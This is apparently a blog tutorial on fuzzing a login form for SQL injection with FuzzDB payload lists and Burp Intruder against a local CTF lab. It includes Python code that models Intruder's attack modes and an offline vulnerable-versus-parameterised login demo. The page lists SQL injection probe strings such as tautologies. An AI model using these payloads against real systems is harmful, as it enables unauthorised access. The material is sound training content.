[Security Testing Learning] Automated Injection Attacks: Combining FuzzDB and Burp Suite

1. FuzzDB

FuzzDB is an open source database of payloads for application fuzz testing: a collection of attack patterns, predictable resource names and other primitives for black-box fault injection.

Its main payload categories:

  1. OS command injection
  2. Directory traversal
  3. File upload bypass
  4. Authentication bypass
  5. XSS
  6. SQL injection
  7. HTTP header injection
  8. CRLF injection
  9. NoSQL injection and more

It also ships webshells written in several languages and commonly used username and password dictionaries.

GitHub address: GitHub - fuzzdb-project/fuzzdb: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.

Download the repository and unzip it locally. The attack payloads are under the attack directory, sorted by vulnerability class; the SQL injection detection strings used below live in attack/sql-injection/detect.

2. Set up the SQLi-CTF training range

GitHub address: GitHub - Corb3nik/SQLi-CTF: A training CTF covering non-blind SQL injection techniques

Installation and deployment steps:

1) Download SQLi-CTF-master and unzip it locally.

2) Change into the unzipped directory: cd SQLi-CTF-master

3) Run: docker-compose up

4) Visit http://127.0.0.1:12000 . If the CTF page is displayed, the service has started successfully.

Practical exercise:

1) Select Level2.

2) Enter the username test and password test123, and intercept the login request with Burp Suite.

3) Send the login request to Intruder, clear the automatically marked positions, and mark only the username parameter as a payload position.

Attack type description:

Sniper: a single payload set, one position at a time. If both username and password are marked, the username position is run through the whole dictionary while password keeps its original value, then the password position is run through it while username keeps its original value. Request count: number of positions times number of payloads.

Battering ram: a single payload set, inserted into all marked positions at the same time, so every position receives the same value on each request. Request count: number of payloads.

Pitchfork: one payload set per position, advanced in lockstep: request i uses the i-th entry of every set, and the attack stops when the shortest set is exhausted. The sets are not cross-combined, so this mode suits data that pairs up, such as a list of usernames and the matching list of passwords.

Cluster bomb: one payload set per position, combined as a Cartesian product, so every value of each set is tried against every value of the others. The request count is the product of the set sizes, which makes the attack very long with several dictionaries.
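To make the four modes concrete, here is an added example (not code from the page, the course, or Burp) that reproduces each mode's payload-combination rule in Python for the username/password form above. The baseline values are the ones submitted in the exercise; the payload lists are constructed stand-ins, not the contents of any fuzzdb file.

```python
"""Re-create the payload-combination rules of Burp Intruder's four attack types.

Each function takes the baseline request parameters captured from the login
form and returns the list of parameter dicts that Intruder would send, so the
request count of each mode can be compared directly. Payload values are
constructed stand-ins for the fuzzdb lists.
"""
from itertools import product
from typing import Dict, List

Request = Dict[str, str]


def sniper(baseline: Request, positions: List[str], payloads: List[str]) -> List[Request]:
    """Single payload set, one position at a time.

    Every other marked position keeps its baseline value, so the attack sends
    len(positions) * len(payloads) requests.
    """
    requests = []
    for pos in positions:
        for payload in payloads:
            req = dict(baseline)
            req[pos] = payload
            requests.append(req)
    return requests


def battering_ram(baseline: Request, positions: List[str], payloads: List[str]) -> List[Request]:
    """Single payload set, same payload in every marked position at once.

    Sends len(payloads) requests.
    """
    requests = []
    for payload in payloads:
        req = dict(baseline)
        for pos in positions:
            req[pos] = payload
        requests.append(req)
    return requests


def pitchfork(baseline: Request, payload_sets: Dict[str, List[str]]) -> List[Request]:
    """One payload set per position, advanced in lockstep.

    Request i takes the i-th entry of every set; the attack stops when the
    shortest set runs out, and the sets are never cross-combined.
    """
    shortest = min(len(values) for values in payload_sets.values())
    requests = []
    for i in range(shortest):
        req = dict(baseline)
        for pos, values in payload_sets.items():
            req[pos] = values[i]
        requests.append(req)
    return requests


def cluster_bomb(baseline: Request, payload_sets: Dict[str, List[str]]) -> List[Request]:
    """One payload set per position, combined as a Cartesian product.

    Every value of each set is tried against every value of the others, so the
    request count is the product of the set sizes.
    """
    positions = list(payload_sets)
    requests = []
    for combo in product(*(payload_sets[pos] for pos in positions)):
        req = dict(baseline)
        req.update(zip(positions, combo))
        requests.append(req)
    return requests


if __name__ == "__main__":
    # Baseline values from the exercise, and constructed payload lists.
    baseline = {"username": "test", "password": "test123"}
    sqli_probes = ["' or 1=1--", "\" or 1=1--", "admin'--"]
    passwords = ["password", "123456"]
    both = ["username", "password"]
    sets = {"username": sqli_probes, "password": passwords}
    print("sniper:        ", len(sniper(baseline, both, sqli_probes)), "requests")
    print("battering ram: ", len(battering_ram(baseline, both, sqli_probes)), "requests")
    print("pitchfork:     ", len(pitchfork(baseline, sets)), "requests")
    print("cluster bomb:  ", len(cluster_bomb(baseline, sets)), "requests")
```

With three SQL probes and two passwords, sniper over both positions sends 6 requests, battering ram 3, pitchfork 2 (the shorter list bounds it) and cluster bomb 6; with the 3,000-plus lines of a real fuzzdb list in both positions, cluster bomb is in the millions, which is why the page's exercise marks the username position only.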

4) Payload set: load fuzzdb-master\attack\sql-injection\detect\xplatform.txt as the payload list for the username position.

5) Set the attack options. A Grep - Match entry for a login-success string or a database-error string makes hits visible in the results table independently of response length.

6) Start the attack.

7) Attack results: with the dictionary loaded, the results table shows that several of the payloads got through.

In this example the Length column (the length of the returned page) is used to pick out the requests that injected successfully: several payloads produced a response length different from the baseline login. Length is only a first filter. A payload that alters the query without changing the page (for example, one whose injected condition still yields no rows) has the same length as a plain failed login, and a longer page may be a verbose database error rather than a login. Sort by length, then open the flagged responses, check the status code and any Grep - Match hits, and confirm each injection by hand.
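The fuzz run and the length-based triage, modelled offline as an added example (not code from the page, the course, or SQLi-CTF): an in-memory SQLite login built by string formatting stands in for the vulnerable level, a handful of constructed probes in the style of xplatform.txt stand in for the fuzzdb list, and each response is compared by length against the baseline login, with an error-string and success-string check alongside. The users table, the page templates and the probes are all assumptions made for the example; a parameterised login is run through the same triage to show what a non-injectable target looks like.

```python
"""Offline model of fuzzing the username position and triaging by length."""
import sqlite3
from typing import Callable, Dict, List, Tuple

BASELINE_USER = "test"       # the non-malicious value submitted on the page
PASSWORD = "test123"         # the password position is left unchanged

# Constructed probes for the username position (not copied from xplatform.txt).
PAYLOADS = [
    BASELINE_USER,
    "' or 1=1 or '1'='1",    # tautology: matches every row
    "admin' or '1'='1",      # tautology scoped to one account
    "'",                     # unbalanced quote: provokes a syntax error
    "' and '1'='2",          # injects, but the query still returns no rows
]


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the level's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.executemany("insert into users values (?, ?)",
                   [("admin", "s3cret"), ("alice", "wonderland")])
    return db


def render(rows: List[Tuple[str]]) -> str:
    """Page body for a login attempt; its length depends on the outcome."""
    if rows:
        names = ", ".join(r[0] for r in rows)
        return ("<html><body><h1>Welcome, " + names + "</h1>"
                "<a href='/logout'>Logout</a></body></html>")
    return "<html><body><p>Invalid username or password.</p></body></html>"


def render_error(message: str) -> str:
    return "<html><body><pre>Database error: " + message + "</pre></body></html>"


def vulnerable_login(db: sqlite3.Connection, username: str, password: str) -> str:
    """The bug under test: user input is interpolated into the SQL text."""
    sql = (f"select username from users where username='{username}' "
           f"and password='{password}'")
    try:
        return render(db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return render_error(str(exc))


def safe_login(db: sqlite3.Connection, username: str, password: str) -> str:
    """Same query with bound parameters: input cannot change the query shape."""
    rows = db.execute("select username from users where username=? and password=?",
                      (username, password)).fetchall()
    return render(rows)


def fuzz_username(login: Callable[[str, str], str], payloads: List[str]) -> List[Dict]:
    """Send each payload in the username position and record the response."""
    results = []
    for p in payloads:
        body = login(p, PASSWORD)
        results.append({"payload": p, "body": body, "length": len(body)})
    return results


def triage(results: List[Dict]) -> List[Tuple[str, List[str]]]:
    """Length-based triage as on the page, plus two checks length alone misses:
    a database error in the body, and the login-success marker."""
    base_len = next(r["length"] for r in results if r["payload"] == BASELINE_USER)
    flagged = []
    for r in results:
        reasons = []
        if r["length"] != base_len:
            reasons.append("length differs from baseline")
        if "Database error" in r["body"]:
            reasons.append("SQL error in response")
        if "Welcome" in r["body"]:
            reasons.append("logged in without a valid password")
        if reasons:
            flagged.append((r["payload"], reasons))
    return flagged


def run(login_impl: Callable[[sqlite3.Connection, str, str], str]) -> List[Tuple[str, List[str]]]:
    """Fuzz one login implementation against a fresh database and triage the results."""
    db = make_db()
    return triage(fuzz_username(lambda u, p: login_impl(db, u, p), PAYLOADS))


if __name__ == "__main__":
    for name, impl in (("vulnerable", vulnerable_login), ("parameterised", safe_login)):
        print(name, "login:")
        for payload, reasons in run(impl) or [("(nothing flagged)", [])]:
            print("  ", repr(payload), "->", "; ".join(reasons))
```

Against the vulnerable login, the two tautologies are flagged by both length and the success marker and the lone quote by the error string, while `' and '1'='2` injects successfully yet never changes the length, which is why length alone under-reports. Against the parameterised login nothing is flagged. To run the same triage against the real lab, replace PAYLOADS with the lines of xplatform.txt and the login functions with an HTTP POST to the level's login form.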

The above is summarized and compiled from the "Web Security Attack and Defense Practice" course on Geek Time.

Origin blog.csdn.net/aovenus/article/details/127931085